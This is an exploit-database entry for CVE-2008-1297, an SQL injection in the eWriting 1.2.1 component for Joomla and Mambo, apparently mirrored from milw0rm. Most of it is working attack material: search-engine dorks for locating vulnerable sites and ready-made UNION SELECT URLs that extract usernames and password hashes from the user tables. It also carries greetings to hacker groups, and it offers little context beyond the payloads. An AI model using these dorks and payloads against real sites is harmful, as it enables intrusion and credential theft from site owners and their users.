[] NeoSense
E X P L O I T S
title author type platform port cve id

Mambo Component eWriting 1.2.1 - 'cat' SQL Injection

Author: Don
type: webapps
platform: php
port: 
date_added: 2008-03-09 
date_updated: 2016-11-15 
verified: 1 
codes: OSVDB-42727;CVE-2008-1297 
tags: 
aliases:  
screenshot_url:  
application_url: 
eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don

# BHack

# b4lc4n.org

# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--

++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.